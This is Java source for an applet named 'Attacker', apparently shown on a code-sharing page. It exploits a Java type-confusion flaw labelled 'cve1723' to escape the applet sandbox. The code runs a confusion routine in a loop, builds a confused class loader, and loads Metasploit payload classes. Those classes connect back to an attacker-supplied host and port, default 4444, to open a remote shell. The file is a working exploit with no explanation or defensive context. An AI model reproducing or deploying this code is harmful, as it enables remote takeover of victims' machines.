Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
package cve1723;
2

3
import java.applet.Applet;
4
import java.awt.*;
5
import java.io.*;
6
import java.net.URL;
7
import java.nio.ByteBuffer;
8
import java.nio.IntBuffer;
9

10
/**
11
 * Attacker applet
12
 */
13
public class Attacker extends Applet {
14
	@Override
15
	public void init() {
16
		super.init();
17

18
		final Confuser c = new Confuser();
19
		for (int i = 0; i < 100000; i++) {
20
			c.confuse(null);
21
		}
22

23
		try {
24
			Thread.sleep(100);
25
		} catch (final InterruptedException ie) {
26
			//swallow
27
		}
28

29
		try {
30
			final ConfusingClassLoader cl = c.confuse(getClass().getClassLoader());
31
			final String names[] = { "msf.x.PayloadX", "msf.x.PayloadX$StreamConnector" };
32
			final String paths[] = { "/msf/x/PayloadX.class", "/msf/x/PayloadX$StreamConnector.class" };
33

34
			final String port = getParameter("lport");
35
			ConfusingClassLoader.defineAndCreate(cl, names, new byte[][] { loadClass(paths[0]), loadClass(paths[1])}, getParameter("data"), getParameter("jar"), getParameter("lhost"), (port == null ? 4444 : Integer.parseInt(port)));
36
		} catch (final Exception e) {
37
			e.printStackTrace();
38
		}
39
	}
40

41
	private byte[] loadClass(final String name) throws IOException {
42
		final ByteArrayOutputStream os = new ByteArrayOutputStream();
43
		{ // load the payload class
44
			final InputStream is = getClass().getResourceAsStream(name);
45
			int read;
46
			byte[] buffer = new byte[2048];
47

48
			while ((read = is.read(buffer, 0, buffer.length)) != -1) {
49
				os.write(buffer, 0, read);
50
			}
51
		}
52

53
		return os.toByteArray();
54
	}
55

56
	@Override
57
	public void paint(final Graphics g) {
58
		super.paint(g);
59

60
		final String tool = System.getSecurityManager() == null ? "null" : System.getSecurityManager().toString();
61
		g.drawString(tool, 0, 10);
62
	}
63
}
64

65